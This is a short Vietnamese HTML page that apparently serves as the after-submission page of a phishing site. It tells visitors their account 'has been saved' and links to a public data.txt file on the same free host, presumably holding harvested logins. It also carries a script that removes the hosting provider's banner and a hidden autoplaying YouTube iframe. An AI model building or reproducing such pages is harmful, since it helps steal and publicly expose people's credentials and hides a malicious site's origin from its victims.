<!DOCTYPE html>
<html>
<head>
	<title>:# VHAE</title>
</head>
<body>
    <div id="asd">
        <h1>Tài khoản của bạn đã được web lưu lại</h1>



<h2>Kẻ xấu có thể truy cập thông tin đăng nhập của bạn<a target="_blank" href="https://vhae9b.000webhostapp.com/ga/data.txt">  Ở ĐÂY</a></h2>
        
    </div>

</body>
</html>
<style>
.center {
  margin: auto;
  width: 50%;
  border: 3px solid green;
  padding: 10px;
}
</style>
<script>window.onload = () => {
   let bannerNode = document.querySelector('[alt="www.000webhost.com"]').parentNode.parentNode;
   bannerNode.parentNode.removeChild(bannerNode);
}</script>


<iframe width="0" height="0" src="https://www.youtube.com/embed/J4jLgauOUPs?autoplay=1&amp;loop=10&amp;" frameborder="0" __idm_id__="469564417"></iframe>

<style>
  
    body {
 background-image: url("https://media2.giphy.com/media/wAEMYm68QZBHG/giphy.gif?cid=ecf05e47e56bda69aa5cbe89bd8e192772b3930c6419d26f&rid=giphy.gif");

}
#asd{
  background-color: #4CAF50; /* Green */
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  border-radius: 30px;
}
#asd a{
  background-color: red; /* Green */
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size:30px;
  border-radius:10px;
}
</style>
